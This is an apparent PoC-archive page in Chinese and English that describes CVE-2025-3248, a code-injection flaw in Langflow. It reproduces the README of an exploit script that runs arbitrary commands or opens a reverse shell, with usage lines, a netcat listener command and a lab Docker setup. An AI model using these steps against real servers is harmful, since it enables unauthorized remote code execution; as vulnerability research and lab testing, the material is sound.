关联漏洞
标题:
Langflow 安全漏洞
(CVE-2025-3248)
描述:Langflow是Langflow开源的一个用于构建多代理和 RAG 应用程序的可视化框架。 Langflow 1.3.0之前版本存在安全漏洞,该漏洞源于/api/v1/validate/code端点存在代码注入漏洞,可能导致远程未经验证的攻击者执行任意代码。
描述
This Python script exploits CVE-2025-3248 to execute arbitrary commands or spawn a reverse shell on a vulnerable system. Authentication is required to use this exploit.
介绍
# Authenticated CVE-2025-3248 Langflow Remote Code Execution
This Python script exploits **CVE-2025-3248** to execute arbitrary commands or spawn a reverse shell on a vulnerable system.
**Authentication is required** to use this exploit.
---
## Features
- **Authenticated Command Execution:** Run arbitrary system commands on the target.
- **Reverse Shell:** Spawn a reverse shell to your listener.
- **Proxy Support:** Route requests through a proxy (e.g., Burp Suite).
---
## Requirements
- Python 3.x
- `requests` library
Install dependencies with:
```bash
pip install requests
```
---
## Usage
```bash
python3 exploit.py -u <TARGET_URL> -l <USERNAME> -p <PASSWORD> [-c <COMMAND>] [--proxy <PROXY>] [--lhost <LHOST> --lport <LPORT>]
```
### Arguments
| Argument | Description | Required |
|------------------|--------------------------------------------------|----------|
| `-u`, `--url` | Target base URL (e.g., `https://target.com`) | Yes |
| `-l`, `--login` | Admin username | Yes |
| `-p`, `--password` | Admin password | Yes |
| `-c`, `--command`| Command to execute on the target | No* |
| `--proxy` | Proxy URL (e.g., `http://127.0.0.1:8080`) | No |
| `--lhost` | Local host for reverse shell | No* |
| `--lport` | Local port for reverse shell | No* |
\* You must specify either a command (`-c`) or both `--lhost` and `--lport` for a reverse shell.
---
### Examples
#### 1. Execute a Command
```bash
python3 exploit.py -u https://target.com -l admin -p password -c "id"
```
#### 2. Get a Reverse Shell
Start a listener on your machine:
```bash
nc -lvnp 4444
```
Then run:
```bash
python3 exploit.py -u https://target.com -l admin -p password --lhost YOUR_IP --lport 4444
```
#### 3. Use a Proxy
```bash
python3 exploit.py -u https://target.com -l admin -p password -c "whoami" --proxy http://127.0.0.1:8080
```
---
## Docker image
### Deploying the image
You can deploy the Docker image using the following command:
```bash
podman compose up -d
```
The image will be available at `http://localhost:7860`.
Credits for the compose file: [This repository](https://github.com/vulhub/vulhub/tree/master/langflow/CVE-2025-3248)
---
## Disclaimer
This script is for **educational and authorized penetration testing** purposes only.
**Do not use against systems you do not own or have explicit permission to test.**
---
This readme is AI generated.
文件快照
[4.0K] /data/pocs/d57e189345d697f0925d95e11feca04b80aba1cd
├── [4.0K] docker
│ └── [ 313] docker-compose.yml
├── [4.8K] exploit.py
└── [2.6K] README.md
1 directory, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。